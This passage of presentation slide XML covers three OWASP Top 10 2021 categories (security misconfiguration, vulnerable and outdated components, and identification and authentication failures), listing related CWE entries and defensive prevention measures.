              <a:t>CWE-657 Violation of Secure Design Principles</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CWE-799 Improper Control of Interaction Frequency</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CWE-807 Reliance on Untrusted Inputs in a Security Decision</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CWE-840 Business Logic Errors</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CWE-841 Improper Enforcement of Behavioral Workflow</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CWE-927 Use of Implicit Intent for Sensitive Communication</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CWE-1021 Improper Restriction of Rendered UI Layers or Frames</a:t>
            </a:r>
            <a:endParaRPr sz="585">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-1173 Improper Use of Validation Framework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Security Misconfiguration</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311700" y="1152475"/>
            <a:ext cx="4718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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> when any part of the application stack is missing hardened security or improper configurations on cloud services, unnecessary enabled or installed features, default accounts, over descriptive error messages, system security patches, features or configurations are not up to date.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lax Security Settings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Google Shape;163;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4465" l="22973" r="17848" t="5687"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030300" y="1152475"/>
            <a:ext cx="3669850" cy="3134300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>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5</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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2220"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p27"/>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CWE-2 7PK - Environment</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-11 ASP.NET Misconfiguration: Creating Debug Binary</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-13 ASP.NET Misconfiguration: Password in Configuration File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-15 External Control of System or Configuration Setting</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-16 Configuration</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-260 Password in Configuration File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-315 Cleartext Storage of Sensitive Information in a Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-520 .NET Misconfiguration: Use of Impersonation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-526 Exposure of Sensitive Information Through Environmental Variables</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-537 Java Runtime Error Message Containing Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-541 Inclusion of Sensitive Information in an Include File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-547 Use of Hard-coded, Security-relevant Constants</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-611 Improper Restriction of XML External Entity Reference</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-614 Sensitive Cookie in HTTPS Session Without 'Secure' Attribute</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-756 Missing Custom Error Page</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-942 Permissive Cross-domain Policy with Untrusted Domains</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1032 OWASP Top Ten 2017 Category A6 - Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1174 ASP.NET Misconfiguration: Improper Model Validation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p27"/>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A repeatable hardening process makes it fast and easy to deploy another environment that is appropriately locked down. Development, QA, and production environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to set up a new secure environment.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>A minimal platform without any unnecessary features, components, documentation, and samples. Remove or do not install unused features and frameworks.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>A task to review and update the configurations appropriate to all security notes, updates, and patches as part of the patch management process (see A06:2021-Vulnerable and Outdated Components). Review cloud storage permissions (e.g., S3 bucket permissions).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>A segmented application architecture provides effective and secure separation between components or tenants, with segmentation, containerization, or cloud security groups (ACLs).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Sending security directives to clients, e.g., Security Headers.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>An automated process to verify the effectiveness of the configurations and settings in all environments.</a:t>
            </a:r>
            <a:endParaRPr b="1"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Vulnerable and Outdated Components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77" name="Google Shape;17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Vulnerable and outdated components are most likely vulnerable to exploitation. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Components such as libraries, frameworks and other software modules run with the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as the application. Attackers that can take over these components will have the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as the application.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Applications and APIs that use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with known vulnerabilities are open to attacks.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Toxic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Dependencies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p28"/>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6</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="Google Shape;179;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4334825" y="3641500"/>
            <a:ext cx="4809175" cy="150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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Vulnerable and Outdated Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p29"/>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CWE-937 OWASP Top 10 2013: Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1035 2017 Top 10 A9: Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1104 Use of Unmaintained Third Party Components</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p29"/>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Remove unused dependencies, unnecessary features, components, files, and documentation.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Continuously inventory the versions of both client-side and server-side components (e.g., frameworks, libraries) and their dependencies using tools like versions, OWASP Dependency Check, retire.js, etc. Continuously monitor sources like Common Vulnerability and Exposures (CVE) and National Vulnerability Database (NVD) for vulnerabilities in the components. Use software composition analysis tools to automate the process. Subscribe to email alerts for security vulnerabilities related to components you use.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Only obtain components from official sources over secure links. Prefer signed packages to reduce the chance of including a modified, malicious component (See A08:2021-Software and Data Integrity Failures).</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Monitor for libraries and components that are unmaintained or do not create security patches for older versions. If patching is not possible, consider deploying a virtual patch to monitor, detect, or protect against the discovered issue.</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Every organization must ensure an ongoing plan for monitoring, triaging, and applying updates or configuration changes for the lifetime of the application or portfolio.</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Identification and Authentication Failures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92" name="Google Shape;192;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functions related to authentication and session management are often implemented incorrectly. This allows attackers to compromise passwords, keys, or session token which can to the access of another user’s account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password Mismanagement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>User Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session Fixation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weak Session IDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p30"/>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7</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Google Shape;194;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="2796" r="5812" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3390500" y="2706950"/>
            <a:ext cx="5614799" cy="230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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Identification and Authentication Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2220"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p31"/>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CWE-255 Credentials Management Errors</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-259 Use of Hard-coded Password</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-287 Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-288 Authentication Bypass Using an Alternate Path or Channel</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-290 Authentication Bypass by Spoofing</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
